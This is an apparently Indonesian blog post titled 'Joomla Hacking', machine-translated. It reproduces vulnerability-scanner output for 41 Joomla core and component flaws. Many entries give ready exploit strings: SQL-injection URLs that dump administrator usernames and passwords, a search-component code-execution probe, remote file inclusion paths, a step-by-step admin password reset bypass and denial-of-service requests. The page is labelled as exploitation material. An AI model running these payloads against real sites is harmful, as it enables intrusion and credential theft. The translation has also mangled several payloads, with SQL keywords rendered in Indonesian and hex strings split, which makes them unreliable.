75n1.com

close
close

Follow by Email

Joomla Hacking

Versi Generik keluarga ....... [1.5.x]

~ 1.5.x htaccess.txt mengungkapkan [1.5.4 - 1.5.14]
~ 1.5.x en-GB.ini mengungkapkan [1.5.12 - 1.5.14]

berbagai versi: [1.5.12 - 1.5.14]

kerentanan Ditemukan


# 1
Info -> Generik: htaccess.txt belum diganti.
Versi yang dipengaruhi: Apa
Periksa: /htaccess.txt
Exploit: pertahanan Generic diterapkan di .htaccess tidak tersedia, sehingga pemanfaatan lebih mungkin untuk berhasil.
Rentan? iya nih

# 2
Info -> Generik: direktori Administrator tidak dilindungi
Versi yang dipengaruhi: Apa
Periksa: / administrator /
Exploit: Direktori default / administrator terdeteksi. Penyerang dapat bruteforce account administrator.
Rentan? N / A

# 3
Info -> Inti: Beberapa XSS / CSRF Kerentanan
Versi yang dipengaruhi: 1.5.9 <=
Periksa: /?1.5.9-x
Exploit: Serangkaian XSS dan CSRF kesalahan ada di aplikasi administrator. Dipengaruhi komponen administrator termasuk com_admin, com_media, com_search. Kedua com_admin dan com_search mengandung kerentanan XSS, dan com_media berisi 2 kerentanan CSRF.
Rentan? Tidak

# 4
Info -> Inti: JSession SSL Sesi Pengungkapan Kerentanan
Versi dilakukan: Joomla! 1.5.8 <=
Periksa: /?1.5.8-x
Exploit: Saat menjalankan sebuah situs di bawah SSL (seluruh situs dipaksa untuk berada di bawah ssl), Joomla! tidak mengatur bendera SSL pada cookie. Hal ini dapat memungkinkan seseorang pemantauan jaringan untuk menemukan cookie yang terkait dengan sesi.
Rentan? Tidak

# 5
Info -> Inti: Frontend XSS Vulnerability
Versi dilakukan: 1.5.10 <=
Periksa: /?1.5.10-x
Exploit: Beberapa nilai yang keluaran dari database tanpa melarikan diri dengan benar. Kebanyakan senar tersebut yang bersumber dari panel administrator. Berbahaya admin normal dapat memanfaatkan itu untuk mendapatkan akses ke yang super admin.
Rentan? Tidak

# 6
Info -> Inti: Hilang JEXEC Check - Jalur Pengungkapan Kerentanan
Versi dilakukan: 1.5.11 <=
Periksa: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Rentan? Tidak

# 7
Info -> Inti: Hilang JEXEC Check - Jalur Pengungkapan Kerentanan
Versi dilakukan: 1.5.12 <=
Periksa: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Rentan? Tidak

# 8
Info -> Inti: Frontend XSS - HTTP_REFERER tidak disaring dengan benar Kerentanan
Versi dilakukan: 1.5.11 <=
Periksa: /?1.5.11-x-http_ref
Exploit: Seorang penyerang dapat menyuntikkan JavaScript atau DHTML kode yang akan dieksekusi dalam konteks pengguna browser yang ditargetkan, yang memungkinkan penyerang untuk mencuri cookies. variabel HTTP_REFERER tidak benar diurai.
Rentan? Tidak

# 9
Info -> Inti: Frontend XSS - PHP_SELF tidak disaring dengan benar Kerentanan
Versi dilakukan: 1.5.11 <=
Periksa: /?1.5.11-x-php-s3lf
Exploit: Seorang penyerang bisa menyuntikkan kode JavaScript di URL yang akan dijalankan dalam konteks pengguna peramban ditargetkan.
Rentan? Tidak

# 10
Info -> Inti: Authentication Bypass Vulnerability
Versi dilakukan: Joomla! 1.5.3 <=
Periksa: / administrator /
Exploit: Backend menerima password untuk custom Super Administrator ketika LDAP diaktifkan
Rentan? Tidak

# 11
Info -> Inti: Jalur Pengungkapan Kerentanan
Versi dilakukan: Joomla! 1.5.3 <=
Periksa: /?1.5.3-path-disclose
Exploit: URL Dibuat dapat mengungkapkan path absolut
Rentan? Tidak

# 12
Info -> Inti: Pengguna diarahkan Spamming Kerentanan
Versi dilakukan: Joomla! 1.5.3 <=
Periksa: /?1.5.3-spam
Exploit: Pengguna mengarahkan spam yang
Rentan? Tidak

# 13
Info -> Inti: joomla.php Remote File Inclusion Vulnerability
Versi dilakukan: 1.0.0
Periksa: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Rentan? Tidak

# 14
Info -> Inti: Admin Backend Cross Site Request Pemalsuan Kerentanan
Versi dilakukan: 1.0.13 <=
Periksa: / administrator /
Exploit: Hal ini membutuhkan administrator untuk login dan akan tertipu halaman web khusus dibuat.
Rentan? iya nih

# 15
Info -> Inti: Jalur Pengungkapan Kerentanan
Versi dilakukan: Joomla! 1.5.12 <=
Periksa: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Rentan? Tidak

# 16
Info -> CorePlugin: XStandard Editor X_CMS_LIBRARY_PATH lokal Directory Traversal Kerentanan
Versi dilakukan: Joomla! 1.5.8 <=
Periksa: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Menyerahkan X_CMS_LIBRARY_PATH header baru dengan nilai ../ ke /plugins/editors/xstandard/attachmentlibrary.php
Rentan? Tidak

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versi dilakukan: 1.5.10 <=
Periksa: / templates / ja_purity /
Exploit: Sebuah kerentanan XSS ada di template JA_Purity yang kapal dengan Joomla! 1.5.
Rentan? Tidak

# 18
Info -> CoreLibrary: phpmailer eksekusi kode jauh Kerentanan
Versi dilakukan: Joomla! 1.5.0 Beta / Stabil
Periksa: /libraries/phpmailer/phpmailer.php
Exploit: N / A
Rentan? Tidak

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon beberapa kerentanan
Versi dilakukan: Joomla! 1.5.12
Periksa: / plugins / editor / TinyMCE / JScripts / tiny_mce / plugins / tinybrowser /
Exploit: Sementara Joomla! Tim mengumumkan hanya Upload File kerentanan, sebenarnya ada banyak. Lihat: http://www.milw0rm.com/exploits/9296
Rentan? iya nih

# 20
Info -> CoreComponent: Joomla jauh Admin Password Change Vulnerability
Versi yang dipengaruhi: 1.5.5 <=
Periksa: /components/com_user/controller.php
Eksploitasi: 1. Pergi ke url: target.com/index.php?option=com_user&view=reset&layout=confir m 2. Tulis ke lapangan "token" char 'dan klik OK. 3. Tulis password baru untuk admin 4. Pergi ke url: target.com/administrator/ 5. Login admin dengan password baru
Rentan? Tidak

# 21
Info -> CoreComponent: Com_content SQL Injection Vulnerability
Versi Terkena: Joomla! 1.0.0 <=
Periksa: / komponen / Com_content /
Exploit: /index.php?option=com_content&task=blogcategory&id= 60 & Itemid = 99999 + UNION + SELECT + 1, concat (0x1E, userna saya, 0x3a, password, 0x1E, 0x3a, jenis user, 0x1E), 3,4,5 + FRO M + jos_users + mana + jenis user = 0x53757065722041646d696 e6973747261746f72--
Rentan? Tidak

# 22
Info -> CoreComponent: com_search eksekusi kode jauh Kerentanan
Versi Terkena: Joomla! 1.5.0 beta 2 <=
Periksa: / komponen / com_search /
Exploit: /index.php?option=com_search&Itemid=1&searchword=%2 2% 3Becho% 20md5 (911)% 3B
Rentan? Tidak

# 23
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versi yang dipengaruhi: N / A
Periksa: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Rentan? Tidak

# 24
Info -> CoreComponent: MailTo Injection Vulnerability SQL
Versi dilakukan: N / A
Periksa: / komponen / com_mailto /
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=55 0513 + dan + 1 = 2 + union + pilih + concat (username, char (58), password) + dari jos_users + + di mana + jenis user = 0x5375706 5722041646d696e6973747261746f72-- & Itemid = 1
Rentan? Tidak

# 25
Info -> CoreComponent: Com_content Blind SQL Injection Vulnerability
Versi dilakukan: Joomla! 1.5.0 RC3
Periksa: / komponen / Com_content /
Exploit: /index.php?option=com_content&view=% a a & id '+' '=' = 25 & Itemid = 28
Rentan? Tidak

# 26
Info -> CoreComponent: Com_content XSS Vulnerability
Versi Terkena: Joomla! 1.5.7 <=
Periksa: / komponen / Com_content /
Exploit: The default pada Com_content kiriman artikel memungkinkan masuknya tag berbahaya HTML (script, dll). Ini hanya mempengaruhi pengguna dengan tingkat akses Pengarang atau lebih tinggi, dan hanya jika Anda belum menetapkan pilihan penyaringan dalam konfigurasi Com_content.
Rentan? Tidak

# 27
Info -> CoreComponent: com_weblinks XSS Vulnerability
Versi Terkena: Joomla! 1.5.7 <=
Periksa: / komponen / com_weblinks /
Exploit: [Memerlukan akun pengguna yang valid] com_weblinks memungkinkan HTML mentah menjadi judul dan deskripsi tag untuk pengajuan weblink (baik dari bentuk administrator dan situs pengiriman).
Rentan? Tidak

# 28
Info -> CoreComponent: com_mailto Email Spam Kerentanan
Versi Terkena: Joomla! 1.5.6 <=
Periksa: / komponen / com_mailto /
Exploit: Komponen mailto tidak memverifikasi keabsahan URL sebelum mengirimkan.
Rentan? Tidak

# 29
Info -> CoreComponent: view Com_content = SQL arsip Injection Vulnerability
Versi dilakukan: Joomla! 1.5.0 Beta1 / Beta2 / RC1
Periksa: / komponen / Com_content /
Exploit: vars POST tanpa filter - filter, bulan, tahun ke /index.php?option=com_content&view=archive
Rentan? Tidak

# 30
Info -> CoreComponent: Com_content XSS Vulnerability
Versi Terkena: Joomla! 1.5.9 <=
Periksa: / komponen / Com_content /
Exploit: Sebuah kerentanan XSS ada di kategori pandangan Com_content.
Rentan? Tidak

# 31
Info -> CoreComponent: com_installer CSRF Kerentanan
Versi dilakukan: Joomla! 1.5.0 Beta
Periksa: / administrator / components / com_installer /
Exploit: N / A
Rentan? Tidak

# 32
Info -> CoreComponent: com_search Memory comsumption DoS Kerentanan
Versi dilakukan: Joomla! 1.5.0 Beta
Periksa: / komponen / com_search /
Exploit: N / A
Rentan? Tidak

# 33
Info -> CoreComponent: com_poll (mosmsg) Konsumsi Memory DOS Kerentanan
Versi dilakukan: 1.0.7 <=
Periksa: / komponen / com_poll /
Exploit: Kirim permintaan /index.php?option=com_poll&task=results&id=14&mosms g = DOS @ HERE <<> AAA <> <>
Rentan? Tidak

# 34
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versi dilakukan: N / A
Periksa: / komponen / com_banners /
Exploit: /index.php?option=com_banners&task=archivesection&i d = 0 '+ dan +' 1 '=' 1 :: / index.php option = com_banners & tugas = archivesection & i d = 0 '+ dan +' 1 '=' 2?
Rentan? Tidak

# 35
Info -> CoreComponent: com_mailto batas waktu Kerentanan
Versi dilakukan: 1.5.13 <=
Periksa: / komponen / com_mailto /
Exploit: [Membutuhkan akun pengguna yang valid] Dalam com_mailto, itu mungkin untuk memotong perlindungan batas waktu terhadap mengirim email otomatis.
Rentan? iya nih

# 36
Info -> Komponen: PBE XSS + Berkas Inklusi Kerentanan
Versi yang dipengaruhi: 1.0.4 <=
Periksa: / komponen / com_jce /
Exploit: 1) Masukan diteruskan ke "img", "title", "w", dan "h" parameter dalam jce.php tidak benar dibersihkan sebelum dikembalikan ke pengguna. Ini dapat dimanfaatkan untuk mengeksekusi HTML sewenang-wenang dan kode script di sesi browser pengguna dalam konteks situs yang terpengaruh. 2) Masukan diteruskan ke "plugin" dan "file" parameter dalam jce.php tidak benar diverifikasi sebelum digunakan untuk menyertakan file. Ini dapat dimanfaatkan untuk menyertakan file arbitrary dari sumber daya lokal.
Rentan? Tidak

# 37
Info -> Component: com_k2 (sectionid) Kerentanan SQL Injection
Versi dilakukan: 1.0.1 Beta <=
Periksa: / komponen / com_k2 /
Exploit: /index.php?option=com_k2&view=itemlist&category=nul l '+ dan + 1 = 2 + union + pilih + 1, concat (username, 0x3a, pas pedang), 3,4,5,6,7,8 , 9,10,11,12,13,14 + dari jos_users + + di mana + jenis user = 0x53757065722041646d696e6973747261 746f72--
Rentan? Tidak

# 38
Info -> Komponen: Dada Mail Manajer Komponen Remote File Inclusion Vulnerability
Versi Terkena: 2.6 <=
Periksa: / administrator / komponen /
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Rentan? Tidak

# 39
Info -> Komponen: Komponen com_newsfeeds SQL injection
Versi yang dipengaruhi: Setiap <=
Periksa: /index.php?option=com_newsfeeds&view=categories&fee melakukan = -1% 20union% 20select% 201, concat% 28username, char% 2858% 29, password% 29,3,4,5,6,7,8,9 , 10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30% 20from% 20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&fee melakukan = -1% 20union% 20select% 201, concat% 28username, char% 2858% 29, password% 29,3,4,5,6,7,8,9 , 10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30% 20from% 20jos_users--
Rentan? Tidak

# 40
Info -> Komponen: Joomla Komponen com_searchlog SQL Injection
Versi yang dipengaruhi: 3.1.0 <=
Periksa: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Rentan? Tidak

# 41
Info -> Komponen: Joomla Komponen com_djartgallery Beberapa Kerentanan
Versi yang dipengaruhi: 0.9.1 <=
Periksa: /administrator/index.php?option=com_djartgallery&task=editItem&ci d [] = 1 '+ dan + 1 = 1 + - +
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&ci d [] = 1 '+ dan + 1 = 1 + - +
Rentan? N / A

Labels: Exploitations

Thanks for reading Joomla Hacking. Please share...!

0 Comment for "Joomla Hacking"

Back To Top